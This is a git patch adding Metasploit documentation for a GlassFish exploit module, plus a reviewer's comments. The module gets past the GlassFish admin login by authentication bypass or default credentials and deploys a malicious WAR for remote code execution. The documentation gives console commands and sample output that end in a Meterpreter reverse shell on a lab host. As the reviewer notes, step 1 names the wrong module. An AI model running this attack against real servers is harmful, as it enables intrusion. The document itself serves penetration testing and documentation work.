From 8ad61a11c881a761e92f2d4ac662306410dfec19 Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Mon, 27 Mar 2017 19:23:39 +0530 Subject: [PATCH] Documentation on glassfish_deployer --- .../exploit/multi/http/glassfish_deployer.md | 51 +++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 documentation/modules/exploit/multi/http/glassfish_deployer.md diff --git a/documentation/modules/exploit/multi/http/glassfish_deployer.md b/documentation/modules/exploit/multi/http/glassfish_deployer.md new file mode 100644 index 0000000000..c749296554 --- /dev/null +++ b/documentation/modules/exploit/multi/http/glassfish_deployer.md 
@@ -0,0 +1,51 @@ +##Description + +This module logs in to an GlassFish Server (Open Source or Commercial) using various methods (such as authentication bypass, default credentials, or user-supplied login), and deploys a malicious war file in order to get remote code execution. It has been tested on Glassfish 2.x, 3.0, 4.0 and Sun Java System Application Server 9.x. Newer GlassFish versions do not allow remote access (Secure Admin) by default, but is required for exploitation. + +## GlassFish + +GlassFish is an open-source application server project started by Sun Microsystems for the Java EE platform and now sponsored by Oracle Corporation. The supported version is called Oracle GlassFish Server. GlassFish is free software, dual-licensed under two free software licences: the Common Development and Distribution License (CDDL) and the GNU General Public License (GPL) with the classpath exception. + +## Verification Steps + +1. Do: ```use exploit/multi/http/axis2_deployer``` +2. Do: ```set RHOSTS [IP]``` +3. Do: ```set USERNAME [Username]``` +4. Do: ```set PASSWORD [Password]``` +5. Do: ```run``` + +##Sample Output + +``` +msf > use exploit/multi/http/glassfish_deployer +msf exploit(glassfish_deployer) > set RHOST 172.16.182.237 +RHOST => 172.16.182.237 +msf exploit(glassfish_deployer) > set USERNAME admin +USERNAME => admin +msf exploit(glassfish_deployer) > set PASSWORD admin123 +PASSWORD => admin123 +msf exploit(glassfish_deployer) > exploit +[*] Started reverse TCP handler on 172.16.182.112:4444 +[*] Glassfish edition: GlassFish Server Open Source Edition 3.0.1 +[*] Trying GlassFish authentication bypass.. +[+] http://172.16.182.237:4848// - GlassFish - SUCCESSFUL authentication bypass +[*] Uploading payload... +[*] Successfully uploaded +[*] Executing /icDfejbl6Vc9ZobfgVv9LIBES/SV7fVtWuTQFZqtzMPiJ.jsp... 
+[*] Sending stage (30355 bytes) to 172.16.182.237 +[*] Meterpreter session 1 opened (172.16.182.112:4444 -> 172.16.182.237:1472) at 2017-03-27 19:07:58 -0500 +[*] Getting information to undeploy... +[*] Undeploying icDfejbl6Vc9ZobfgVv9LIBES... +[*] Undeployment complete. + +meterpreter > getuid +Server username: Administrator +meterpreter > sysinfo +Computer : juan-6ed9db6ca8 +OS : Windows 2003 5.2 (x86) +Meterpreter : java/java +meterpreter > exit +[*] Shutting down Meterpreter... + + +```
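Review bot: Step 1 of Verification Steps loads the wrong module: `use exploit/multi/http/axis2_deployer` should be `use exploit/multi/http/glassfish_deployer`, to match the file path and the sample output. Step 2 also says `set RHOSTS [IP]` while the sample output uses `set RHOST 172.16.182.237`; the steps should use the option name the module actually registers so they can be followed verbatim. The description lists three login methods (authentication bypass, default credentials, user-supplied login), but the sample output only shows the bypass path succeeding even though USERNAME and PASSWORD were set, so it would help to say when steps 3 and 4 are actually needed and to state in the steps that the test target must have remote admin access (Secure Admin) enabled, as the description requires. Smaller points: `##Description` and `##Sample Output` lack the space after `##` that `## GlassFish` has, "an GlassFish Server" should be "a GlassFish Server", the clause "but is required for exploitation" has no subject, and there are stray blank lines before the closing fence of the sample output.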